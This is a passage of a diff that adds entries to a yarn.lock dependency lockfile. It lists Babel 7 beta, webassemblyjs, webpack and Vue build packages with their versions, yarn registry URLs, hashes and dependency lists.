+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-typeof-symbol/-/plugin-transform-typeof-symbol-7.0.0-beta.47.tgz#03c612ec09213eb386a81d5fa67c234ee4b2034c"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+
+"@babel/plugin-transform-unicode-regex@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/plugin-transform-unicode-regex/-/plugin-transform-unicode-regex-7.0.0-beta.47.tgz#efed0b2f1dfbf28283502234a95b4be88f7fdcb6"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/helper-regex" "7.0.0-beta.47"
+    regexpu-core "^4.1.3"
+
+"@babel/preset-env@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/preset-env/-/preset-env-7.0.0-beta.47.tgz#a3dab3b5fac4de56e3510bdbcb528f1cbdedbe2d"
+  dependencies:
+    "@babel/helper-module-imports" "7.0.0-beta.47"
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-proposal-async-generator-functions" "7.0.0-beta.47"
+    "@babel/plugin-proposal-object-rest-spread" "7.0.0-beta.47"
+    "@babel/plugin-proposal-optional-catch-binding" "7.0.0-beta.47"
+    "@babel/plugin-proposal-unicode-property-regex" "7.0.0-beta.47"
+    "@babel/plugin-syntax-async-generators" "7.0.0-beta.47"
+    "@babel/plugin-syntax-object-rest-spread" "7.0.0-beta.47"
+    "@babel/plugin-syntax-optional-catch-binding" "7.0.0-beta.47"
+    "@babel/plugin-transform-arrow-functions" "7.0.0-beta.47"
+    "@babel/plugin-transform-async-to-generator" "7.0.0-beta.47"
+    "@babel/plugin-transform-block-scoped-functions" "7.0.0-beta.47"
+    "@babel/plugin-transform-block-scoping" "7.0.0-beta.47"
+    "@babel/plugin-transform-classes" "7.0.0-beta.47"
+    "@babel/plugin-transform-computed-properties" "7.0.0-beta.47"
+    "@babel/plugin-transform-destructuring" "7.0.0-beta.47"
+    "@babel/plugin-transform-dotall-regex" "7.0.0-beta.47"
+    "@babel/plugin-transform-duplicate-keys" "7.0.0-beta.47"
+    "@babel/plugin-transform-exponentiation-operator" "7.0.0-beta.47"
+    "@babel/plugin-transform-for-of" "7.0.0-beta.47"
+    "@babel/plugin-transform-function-name" "7.0.0-beta.47"
+    "@babel/plugin-transform-literals" "7.0.0-beta.47"
+    "@babel/plugin-transform-modules-amd" "7.0.0-beta.47"
+    "@babel/plugin-transform-modules-commonjs" "7.0.0-beta.47"
+    "@babel/plugin-transform-modules-systemjs" "7.0.0-beta.47"
+    "@babel/plugin-transform-modules-umd" "7.0.0-beta.47"
+    "@babel/plugin-transform-new-target" "7.0.0-beta.47"
+    "@babel/plugin-transform-object-super" "7.0.0-beta.47"
+    "@babel/plugin-transform-parameters" "7.0.0-beta.47"
+    "@babel/plugin-transform-regenerator" "7.0.0-beta.47"
+    "@babel/plugin-transform-shorthand-properties" "7.0.0-beta.47"
+    "@babel/plugin-transform-spread" "7.0.0-beta.47"
+    "@babel/plugin-transform-sticky-regex" "7.0.0-beta.47"
+    "@babel/plugin-transform-template-literals" "7.0.0-beta.47"
+    "@babel/plugin-transform-typeof-symbol" "7.0.0-beta.47"
+    "@babel/plugin-transform-unicode-regex" "7.0.0-beta.47"
+    browserslist "^3.0.0"
+    invariant "^2.2.2"
+    semver "^5.3.0"
+
+"@babel/preset-stage-2@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/preset-stage-2/-/preset-stage-2-7.0.0-beta.47.tgz#deb930c44d7d6e519a33174bba121a2a630ed654"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-proposal-decorators" "7.0.0-beta.47"
+    "@babel/plugin-proposal-export-namespace-from" "7.0.0-beta.47"
+    "@babel/plugin-proposal-function-sent" "7.0.0-beta.47"
+    "@babel/plugin-proposal-numeric-separator" "7.0.0-beta.47"
+    "@babel/plugin-proposal-throw-expressions" "7.0.0-beta.47"
+    "@babel/preset-stage-3" "7.0.0-beta.47"
+
+"@babel/preset-stage-3@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/preset-stage-3/-/preset-stage-3-7.0.0-beta.47.tgz#17028f3b5dddc548d80404c86ed62622f601597b"
+  dependencies:
+    "@babel/helper-plugin-utils" "7.0.0-beta.47"
+    "@babel/plugin-proposal-async-generator-functions" "7.0.0-beta.47"
+    "@babel/plugin-proposal-class-properties" "7.0.0-beta.47"
+    "@babel/plugin-proposal-object-rest-spread" "7.0.0-beta.47"
+    "@babel/plugin-proposal-optional-catch-binding" "7.0.0-beta.47"
+    "@babel/plugin-proposal-unicode-property-regex" "7.0.0-beta.47"
+    "@babel/plugin-syntax-dynamic-import" "7.0.0-beta.47"
+    "@babel/plugin-syntax-import-meta" "7.0.0-beta.47"
+
+"@babel/runtime@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/runtime/-/runtime-7.0.0-beta.47.tgz#273f5e71629e80f6cbcd7507503848615e59f7e0"
+  dependencies:
+    core-js "^2.5.3"
+    regenerator-runtime "^0.11.1"
+
+"@babel/template@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/template/-/template-7.0.0-beta.47.tgz#0473970a7c0bee7a1a18c1ca999d3ba5e5bad83d"
+  dependencies:
+    "@babel/code-frame" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+    babylon "7.0.0-beta.47"
+    lodash "^4.17.5"
+
+"@babel/traverse@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/traverse/-/traverse-7.0.0-beta.47.tgz#0e57fdbb9ff3a909188b6ebf1e529c641e6c82a4"
+  dependencies:
+    "@babel/code-frame" "7.0.0-beta.47"
+    "@babel/generator" "7.0.0-beta.47"
+    "@babel/helper-function-name" "7.0.0-beta.47"
+    "@babel/helper-split-export-declaration" "7.0.0-beta.47"
+    "@babel/types" "7.0.0-beta.47"
+    babylon "7.0.0-beta.47"
+    debug "^3.1.0"
+    globals "^11.1.0"
+    invariant "^2.2.0"
+    lodash "^4.17.5"
+
+"@babel/types@7.0.0-beta.47":
+  version "7.0.0-beta.47"
+  resolved "https://registry.yarnpkg.com/@babel/types/-/types-7.0.0-beta.47.tgz#e6fcc1a691459002c2671d558a586706dddaeef8"
+  dependencies:
+    esutils "^2.0.2"
+    lodash "^4.17.5"
+    to-fast-properties "^2.0.0"
+
+"@mrmlnc/readdir-enhanced@^2.2.1":
+  version "2.2.1"
+  resolved "https://registry.yarnpkg.com/@mrmlnc/readdir-enhanced/-/readdir-enhanced-2.2.1.tgz#524af240d1a360527b730475ecfa1344aa540dde"
+  dependencies:
+    call-me-maybe "^1.0.1"
+    glob-to-regexp "^0.3.0"
+
+"@nodelib/fs.stat@^1.0.1":
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/@nodelib/fs.stat/-/fs.stat-1.1.0.tgz#50c1e2260ac0ed9439a181de3725a0168d59c48a"
+
+"@shellscape/koa-send@^4.1.0":
+  version "4.1.3"
+  resolved "https://registry.yarnpkg.com/@shellscape/koa-send/-/koa-send-4.1.3.tgz#1a7c8df21f63487e060b7bfd8ed82e1d3c4ae0b0"
+  dependencies:
+    debug "^2.6.3"
+    http-errors "^1.6.1"
+    mz "^2.6.0"
+    resolve-path "^1.3.3"
+
+"@shellscape/koa-static@^4.0.4":
+  version "4.0.5"
+  resolved "https://registry.yarnpkg.com/@shellscape/koa-static/-/koa-static-4.0.5.tgz#b329b55bfd41056a6981c584ae6bace30b5b6b3b"
+  dependencies:
+    "@shellscape/koa-send" "^4.1.0"
+    debug "^2.6.8"
+
+"@vue/babel-preset-app@3.0.0-beta.11":
+  version "3.0.0-beta.11"
+  resolved "https://registry.yarnpkg.com/@vue/babel-preset-app/-/babel-preset-app-3.0.0-beta.11.tgz#c8b889aa73464050f9cd3f9dc621951d85c24508"
+  dependencies:
+    "@babel/plugin-syntax-jsx" "7.0.0-beta.47"
+    "@babel/plugin-transform-runtime" "7.0.0-beta.47"
+    "@babel/preset-env" "7.0.0-beta.47"
+    "@babel/preset-stage-2" "7.0.0-beta.47"
+    "@babel/runtime" "7.0.0-beta.47"
+    babel-helper-vue-jsx-merge-props "^2.0.3"
+    babel-plugin-dynamic-import-node "^1.2.0"
+    babel-plugin-transform-vue-jsx "^4.0.1"
+
+"@vue/component-compiler-utils@^1.2.1":
+  version "1.3.1"
+  resolved "https://registry.yarnpkg.com/@vue/component-compiler-utils/-/component-compiler-utils-1.3.1.tgz#686f0b913d59590ae327b2a1cb4b6d9b931bbe0e"
+  dependencies:
+    consolidate "^0.15.1"
+    hash-sum "^1.0.2"
+    lru-cache "^4.1.2"
+    merge-source-map "^1.1.0"
+    postcss "^6.0.20"
+    postcss-selector-parser "^3.1.1"
+    prettier "^1.13.0"
+    source-map "^0.5.6"
+    vue-template-es2015-compiler "^1.6.0"
+
+"@webassemblyjs/ast@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/ast/-/ast-1.5.12.tgz#a9acbcb3f25333c4edfa1fdf3186b1ccf64e6664"
+  dependencies:
+    "@webassemblyjs/helper-module-context" "1.5.12"
+    "@webassemblyjs/helper-wasm-bytecode" "1.5.12"
+    "@webassemblyjs/wast-parser" "1.5.12"
+    debug "^3.1.0"
+    mamacro "^0.0.3"
+
+"@webassemblyjs/floating-point-hex-parser@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/floating-point-hex-parser/-/floating-point-hex-parser-1.5.12.tgz#0f36044ffe9652468ce7ae5a08716a4eeff9cd9c"
+
+"@webassemblyjs/helper-api-error@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-api-error/-/helper-api-error-1.5.12.tgz#05466833ff2f9d8953a1a327746e1d112ea62aaf"
+
+"@webassemblyjs/helper-buffer@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-buffer/-/helper-buffer-1.5.12.tgz#1f0de5aaabefef89aec314f7f970009cd159c73d"
+  dependencies:
+    debug "^3.1.0"
+
+"@webassemblyjs/helper-code-frame@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-code-frame/-/helper-code-frame-1.5.12.tgz#3cdc1953093760d1c0f0caf745ccd62bdb6627c7"
+  dependencies:
+    "@webassemblyjs/wast-printer" "1.5.12"
+
+"@webassemblyjs/helper-fsm@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-fsm/-/helper-fsm-1.5.12.tgz#6bc1442b037f8e30f2e57b987cee5c806dd15027"
+
+"@webassemblyjs/helper-module-context@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-module-context/-/helper-module-context-1.5.12.tgz#b5588ca78b33b8a0da75f9ab8c769a3707baa861"
+  dependencies:
+    debug "^3.1.0"
+    mamacro "^0.0.3"
+
+"@webassemblyjs/helper-wasm-bytecode@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-wasm-bytecode/-/helper-wasm-bytecode-1.5.12.tgz#d12a3859db882a448891a866a05d0be63785b616"
+
+"@webassemblyjs/helper-wasm-section@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/helper-wasm-section/-/helper-wasm-section-1.5.12.tgz#ff9fe1507d368ad437e7969d25e8c1693dac1884"
+  dependencies:
+    "@webassemblyjs/ast" "1.5.12"
+    "@webassemblyjs/helper-buffer" "1.5.12"
+    "@webassemblyjs/helper-wasm-bytecode" "1.5.12"
+    "@webassemblyjs/wasm-gen" "1.5.12"
+    debug "^3.1.0"
+
+"@webassemblyjs/ieee754@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/ieee754/-/ieee754-1.5.12.tgz#ee9574bc558888f13097ce3e7900dff234ea19a4"
+  dependencies:
+    ieee754 "^1.1.11"
+
+"@webassemblyjs/leb128@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/leb128/-/leb128-1.5.12.tgz#0308eec652765ee567d8a5fa108b4f0b25b458e1"
+  dependencies:
+    leb "^0.3.0"
+
+"@webassemblyjs/utf8@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/utf8/-/utf8-1.5.12.tgz#d5916222ef314bf60d6806ed5ac045989bfd92ce"
+
+"@webassemblyjs/wasm-edit@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-edit/-/wasm-edit-1.5.12.tgz#821c9358e644a166f2c910e5af1b46ce795a17aa"
+  dependencies:
+    "@webassemblyjs/ast" "1.5.12"
+    "@webassemblyjs/helper-buffer" "1.5.12"
+    "@webassemblyjs/helper-wasm-bytecode" "1.5.12"
+    "@webassemblyjs/helper-wasm-section" "1.5.12"
+    "@webassemblyjs/wasm-gen" "1.5.12"
+    "@webassemblyjs/wasm-opt" "1.5.12"
+    "@webassemblyjs/wasm-parser" "1.5.12"
+    "@webassemblyjs/wast-printer" "1.5.12"
+    debug "^3.1.0"
+
+"@webassemblyjs/wasm-gen@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-gen/-/wasm-gen-1.5.12.tgz#0b7ccfdb93dab902cc0251014e2e18bae3139bcb"
+  dependencies:
+    "@webassemblyjs/ast" "1.5.12"
+    "@webassemblyjs/helper-wasm-bytecode" "1.5.12"
+    "@webassemblyjs/ieee754" "1.5.12"
+    "@webassemblyjs/leb128" "1.5.12"
+    "@webassemblyjs/utf8" "1.5.12"
+
+"@webassemblyjs/wasm-opt@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-opt/-/wasm-opt-1.5.12.tgz#bd758a8bc670f585ff1ae85f84095a9e0229cbc9"
+  dependencies:
+    "@webassemblyjs/ast" "1.5.12"
+    "@webassemblyjs/helper-buffer" "1.5.12"
+    "@webassemblyjs/wasm-gen" "1.5.12"
+    "@webassemblyjs/wasm-parser" "1.5.12"
+    debug "^3.1.0"
+
+"@webassemblyjs/wasm-parser@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/wasm-parser/-/wasm-parser-1.5.12.tgz#7b10b4388ecf98bd7a22e702aa62ec2f46d0c75e"
+  dependencies:
+    "@webassemblyjs/ast" "1.5.12"
+    "@webassemblyjs/helper-api-error" "1.5.12"
+    "@webassemblyjs/helper-wasm-bytecode" "1.5.12"
+    "@webassemblyjs/ieee754" "1.5.12"
+    "@webassemblyjs/leb128" "1.5.12"
+    "@webassemblyjs/utf8" "1.5.12"
+
+"@webassemblyjs/wast-parser@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/wast-parser/-/wast-parser-1.5.12.tgz#9cf5ae600ecae0640437b5d4de5dd6b6088d0d8b"
+  dependencies:
+    "@webassemblyjs/ast" "1.5.12"
+    "@webassemblyjs/floating-point-hex-parser" "1.5.12"
+    "@webassemblyjs/helper-api-error" "1.5.12"
+    "@webassemblyjs/helper-code-frame" "1.5.12"
+    "@webassemblyjs/helper-fsm" "1.5.12"
+    long "^3.2.0"
+    mamacro "^0.0.3"
+
+"@webassemblyjs/wast-printer@1.5.12":
+  version "1.5.12"
+  resolved "https://registry.yarnpkg.com/@webassemblyjs/wast-printer/-/wast-printer-1.5.12.tgz#563ca4d01b22d21640b2463dc5e3d7f7d9dac520"
+  dependencies:
+    "@webassemblyjs/ast" "1.5.12"
+    "@webassemblyjs/wast-parser" "1.5.12"
+    long "^3.2.0"
+
+"@webpack-contrib/config-loader@^1.1.1":
+  version "1.1.3"
+  resolved "https://registry.yarnpkg.com/@webpack-contrib/config-loader/-/config-loader-1.1.3.tgz#6cce904cabfd880203db600207fdbf64f4744fd7"
+  dependencies:
+    "@webpack-contrib/schema-utils" "^1.0.0-beta.0"
+    chalk "^2.1.0"
+    cosmiconfig "^5.0.2"
+    loud-rejection "^1.6.0"
+    merge-options "^1.0.1"
+    minimist "^1.2.0"
+    resolve "^1.6.0"
+    webpack-log "^1.1.2"
+
+"@webpack-contrib/schema-utils@^1.0.0-beta.0":
+  version "1.0.0-beta.0"
+  resolved "https://registry.yarnpkg.com/@webpack-contrib/schema-utils/-/schema-utils-1.0.0-beta.0.tgz#bf9638c9464d177b48209e84209e23bee2eb4f65"
+  dependencies:
+    ajv "^6.1.0"
+    ajv-keywords "^3.1.0"
+    chalk "^2.3.2"
+    strip-ansi "^4.0.0"
+    text-table "^0.2.0"
+    webpack-log "^1.1.2"
+
+abbrev@1:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/abbrev/-/abbrev-1.1.1.tgz#f8f2c887ad10bf67f634f005b6987fed3179aac8"
+
+accepts@^1.2.2:
+  version "1.3.5"
+  resolved "https://registry.yarnpkg.com/accepts/-/accepts-1.3.5.tgz#eb777df6011723a3b14e8a72c0805c8e86746bd2"
+  dependencies:
+    mime-types "~2.1.18"
+    negotiator "0.6.1"
+
+acorn-dynamic-import@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/acorn-dynamic-import/-/acorn-dynamic-import-3.0.0.tgz#901ceee4c7faaef7e07ad2a47e890675da50a278"
+  dependencies:
+    acorn "^5.0.0"
+
+acorn@^5.0.0, acorn@^5.6.2:
+  version "5.7.1"
+  resolved "https://registry.yarnpkg.com/acorn/-/acorn-5.7.1.tgz#f095829297706a7c9776958c0afc8930a9b9d9d8"
+
+agentkeepalive@^2.2.0:
+  version "2.2.0"
+  resolved "https://registry.yarnpkg.com/agentkeepalive/-/agentkeepalive-2.2.0.tgz#c5d1bd4b129008f1163f236f86e5faea2026e2ef"
+
+ajv-keywords@^3.0.0, ajv-keywords@^3.1.0:
+  version "3.2.0"
+  resolved "https://registry.yarnpkg.com/ajv-keywords/-/ajv-keywords-3.2.0.tgz#e86b819c602cf8821ad637413698f1dec021847a"
+
+ajv@^6.0.1, ajv@^6.1.0:
+  version "6.5.1"
+  resolved "https://registry.yarnpkg.com/ajv/-/ajv-6.5.1.tgz#88ebc1263c7133937d108b80c5572e64e1d9322d"
+  dependencies:
+    fast-deep-equal "^2.0.1"
+    fast-json-stable-stringify "^2.0.0"
+    json-schema-traverse "^0.4.1"
+    uri-js "^4.2.1"
+
+algoliasearch@^3.24.5:
+  version "3.29.0"
+  resolved "https://registry.yarnpkg.com/algoliasearch/-/algoliasearch-3.29.0.tgz#d04021a5450be55ce314b928bba4a38723399bd8"
+  dependencies:
+    agentkeepalive "^2.2.0"
+    debug "^2.6.8"
+    envify "^4.0.0"
+    es6-promise "^4.1.0"
+    events "^1.1.0"
+    foreach "^2.0.5"
+    global "^4.3.2"
+    inherits "^2.0.1"
+    isarray "^2.0.1"
+    load-script "^1.0.0"
+    object-keys "^1.0.11"
+    querystring-es3 "^0.2.1"
+    reduce "^1.0.1"
+    semver "^5.1.0"
+    tunnel-agent "^0.6.0"
+
+alphanum-sort@^1.0.1, alphanum-sort@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/alphanum-sort/-/alphanum-sort-1.0.2.tgz#97a1119649b211ad33691d9f9f486a8ec9fbe0a3"
+
+amdefine@>=0.0.4:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/amdefine/-/amdefine-1.0.1.tgz#4a5282ac164729e93619bcfd3ad151f817ce91f5"
+
+ansi-align@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/ansi-align/-/ansi-align-2.0.0.tgz#c36aeccba563b89ceb556f3690f0b1d9e3547f7f"
+  dependencies:
+    string-width "^2.0.0"
+
+ansi-escapes@^3.0.0:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/ansi-escapes/-/ansi-escapes-3.1.0.tgz#f73207bb81207d75fd6c83f125af26eea378ca30"
+
+ansi-regex@^2.0.0:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/ansi-regex/-/ansi-regex-2.1.1.tgz#c3b33ab5ee360d86e0e628f0468ae7ef27d654df"
+
+ansi-regex@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/ansi-regex/-/ansi-regex-3.0.0.tgz#ed0317c322064f79466c02966bddb605ab37d998"
+
+ansi-styles@^2.2.1:
+  version "2.2.1"
+  resolved "https://registry.yarnpkg.com/ansi-styles/-/ansi-styles-2.2.1.tgz#b432dd3358b634cf75e1e4664368240533c1ddbe"
+
+ansi-styles@^3.2.1:
+  version "3.2.1"
+  resolved "https://registry.yarnpkg.com/ansi-styles/-/ansi-styles-3.2.1.tgz#41fbb20243e50b12be0f04b8dedbf07520ce841d"
+  dependencies:
+    color-convert "^1.9.0"
+
+any-promise@^1.0.0, any-promise@^1.1.0:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/any-promise/-/any-promise-1.3.0.tgz#abc6afeedcea52e809cdc0376aed3ce39635d17f"
+
+anymatch@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/anymatch/-/anymatch-2.0.0.tgz#bcb24b4f37934d9aa7ac17b4adaf89e7c76ef2eb"
+  dependencies:
+    micromatch "^3.1.4"
+    normalize-path "^2.1.1"
+
+app-root-path@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/app-root-path/-/app-root-path-2.0.1.tgz#cd62dcf8e4fd5a417efc664d2e5b10653c651b46"
+
+aproba@^1.0.3, aproba@^1.1.1:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/aproba/-/aproba-1.2.0.tgz#6802e6264efd18c790a1b0d517f0f2627bf2c94a"
+
+arch@^2.1.0:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/arch/-/arch-2.1.1.tgz#8f5c2731aa35a30929221bb0640eed65175ec84e"
+
+are-we-there-yet@~1.1.2:
+  version "1.1.5"
+  resolved "https://registry.yarnpkg.com/are-we-there-yet/-/are-we-there-yet-1.1.5.tgz#4b35c2944f062a8bfcda66410760350fe9ddfc21"
+  dependencies:
+    delegates "^1.0.0"
+    readable-stream "^2.0.6"
+
+argparse@^1.0.7:
+  version "1.0.10"
+  resolved "https://registry.yarnpkg.com/argparse/-/argparse-1.0.10.tgz#bcd6791ea5ae09725e17e5ad988134cd40b3d911"
+  dependencies:
+    sprintf-js "~1.0.2"
+
+arr-diff@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/arr-diff/-/arr-diff-2.0.0.tgz#8f3b827f955a8bd669697e4a4256ac3ceae356cf"
+  dependencies:
+    arr-flatten "^1.0.1"
+
+arr-diff@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/arr-diff/-/arr-diff-4.0.0.tgz#d6461074febfec71e7e15235761a329a5dc7c520"
+
+arr-flatten@^1.0.1, arr-flatten@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/arr-flatten/-/arr-flatten-1.1.0.tgz#36048bbff4e7b47e136644316c99669ea5ae91f1"
+
+arr-union@^3.1.0:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/arr-union/-/arr-union-3.1.0.tgz#e39b09aea9def866a8f206e288af63919bae39c4"
+
+array-find-index@^1.0.1:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/array-find-index/-/array-find-index-1.0.2.tgz#df010aa1287e164bbda6f9723b0a96a1ec4187a1"
+
+array-union@^1.0.1:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/array-union/-/array-union-1.0.2.tgz#9a34410e4f4e3da23dea375be5be70f24778ec39"
+  dependencies:
+    array-uniq "^1.0.1"
+
+array-uniq@^1.0.1:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/array-uniq/-/array-uniq-1.0.3.tgz#af6ac877a25cc7f74e058894753858dfdb24fdb6"
+
+array-unique@^0.2.1:
+  version "0.2.1"
+  resolved "https://registry.yarnpkg.com/array-unique/-/array-unique-0.2.1.tgz#a1d97ccafcbc2625cc70fadceb36a50c58b01a53"
+
+array-unique@^0.3.2:
+  version "0.3.2"
+  resolved "https://registry.yarnpkg.com/array-unique/-/array-unique-0.3.2.tgz#a894b75d4bc4f6cd679ef3244a9fd8f46ae2d428"
+
+arrify@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/arrify/-/arrify-1.0.1.tgz#898508da2226f380df904728456849c1501a4b0d"
+
+asn1.js@^4.0.0:
+  version "4.10.1"
+  resolved "https://registry.yarnpkg.com/asn1.js/-/asn1.js-4.10.1.tgz#b9c2bf5805f1e64aadeed6df3a2bfafb5a73f5a0"
+  dependencies:
+    bn.js "^4.0.0"
+    inherits "^2.0.1"
+    minimalistic-assert "^1.0.0"
+
+assert@^1.1.1:
+  version "1.4.1"
+  resolved "https://registry.yarnpkg.com/assert/-/assert-1.4.1.tgz#99912d591836b5a6f5b345c0f07eefc08fc65d91"
+  dependencies:
+    util "0.10.3"
+
+assign-symbols@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/assign-symbols/-/assign-symbols-1.0.0.tgz#59667f41fadd4f20ccbc2bb96b8d4f7f78ec0367"
+
+async-each@^1.0.0:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/async-each/-/async-each-1.0.1.tgz#19d386a1d9edc6e7c1c85d388aedbcc56d33602d"
+
+async-limiter@~1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/async-limiter/-/async-limiter-1.0.0.tgz#78faed8c3d074ab81f22b4e985d79e8738f720f8"
+
+async@^1.5.2:
+  version "1.5.2"
+  resolved "https://registry.yarnpkg.com/async/-/async-1.5.2.tgz#ec6a61ae56480c0c3cb241c95618e20892f9672a"
+
+atob@^2.1.1:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/atob/-/atob-2.1.1.tgz#ae2d5a729477f289d60dd7f96a6314a22dd6c22a"
+
+autocomplete.js@^0.29.0:
+  version "0.29.0"
+  resolved "https://registry.yarnpkg.com/autocomplete.js/-/autocomplete.js-0.29.0.tgz#0185f7375ee9daf068f7d52d794bc90dcd739fd7"
+  dependencies:
+    immediate "^3.2.3"
+
+autoprefixer@^6.3.1:
+  version "6.7.7"
+  resolved "https://registry.yarnpkg.com/autoprefixer/-/autoprefixer-6.7.7.tgz#1dbd1c835658e35ce3f9984099db00585c782014"
+  dependencies:
+    browserslist "^1.7.6"
+    caniuse-db "^1.0.30000634"
+    normalize-range "^0.1.2"
+    num2fraction "^1.2.2"
+    postcss "^5.2.16"
+    postcss-value-parser "^3.2.3"
+
+autoprefixer@^8.2.0:
+  version "8.6.3"
+  resolved "https://registry.yarnpkg.com/autoprefixer/-/autoprefixer-8.6.3.tgz#1d38a129e6a4582a565b6570d16f2d7d3de9cbf9"
+  dependencies:
+    browserslist "^3.2.8"
+    caniuse-lite "^1.0.30000856"
+    normalize-range "^0.1.2"
+    num2fraction "^1.2.2"
+    postcss "^6.0.22"
+    postcss-value-parser "^3.2.3"
+
+babel-code-frame@^6.26.0:
+  version "6.26.0"
+  resolved "https://registry.yarnpkg.com/babel-code-frame/-/babel-code-frame-6.26.0.tgz#63fd43f7dc1e3bb7ce35947db8fe369a3f58c74b"
+  dependencies:
+    chalk "^1.1.3"
+    esutils "^2.0.2"
+    js-tokens "^3.0.2"
+
+babel-helper-vue-jsx-merge-props@^2.0.3:
+  version "2.0.3"
+  resolved "https://registry.yarnpkg.com/babel-helper-vue-jsx-merge-props/-/babel-helper-vue-jsx-merge-props-2.0.3.tgz#22aebd3b33902328e513293a8e4992b384f9f1b6"
+
+babel-loader@8.0.0-beta.3:
+  version "8.0.0-beta.3"
+  resolved "https://registry.yarnpkg.com/babel-loader/-/babel-loader-8.0.0-beta.3.tgz#49efeea6e8058d5af860a18a6de88b8c1450645b"
+  dependencies:
+    find-cache-dir "^1.0.0"
+    loader-utils "^1.0.2"
+    mkdirp "^0.5.1"
+    util.promisify "^1.0.0"
+
+babel-plugin-dynamic-import-node@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/babel-plugin-dynamic-import-node/-/babel-plugin-dynamic-import-node-1.2.0.tgz#f91631e703e0595e47d4beafbb088576c87fbeee"
+  dependencies:
+    babel-plugin-syntax-dynamic-import "^6.18.0"
+
+babel-plugin-syntax-dynamic-import@^6.18.0:
+  version "6.18.0"
+  resolved "https://registry.yarnpkg.com/babel-plugin-syntax-dynamic-import/-/babel-plugin-syntax-dynamic-import-6.18.0.tgz#8d6a26229c83745a9982a441051572caa179b1da"
+
+babel-plugin-transform-vue-jsx@^4.0.1:
+  version "4.0.1"
+  resolved "https://registry.yarnpkg.com/babel-plugin-transform-vue-jsx/-/babel-plugin-transform-vue-jsx-4.0.1.tgz#2c8bddce87a6ef09eaa59869ff1bfbeeafc5f88d"
+  dependencies:
+    esutils "^2.0.2"
+
+babel-runtime@^6.26.0:
+  version "6.26.0"
+  resolved "https://registry.yarnpkg.com/babel-runtime/-/babel-runtime-6.26.0.tgz#965c7058668e82b55d7bfe04ff2337bc8b5647fe"
+  dependencies:
+    core-js "^2.4.0"
+    regenerator-runtime "^0.11.0"
+
+babylon@7.0.0-beta.47:
+  version "7.0.0-beta.47"
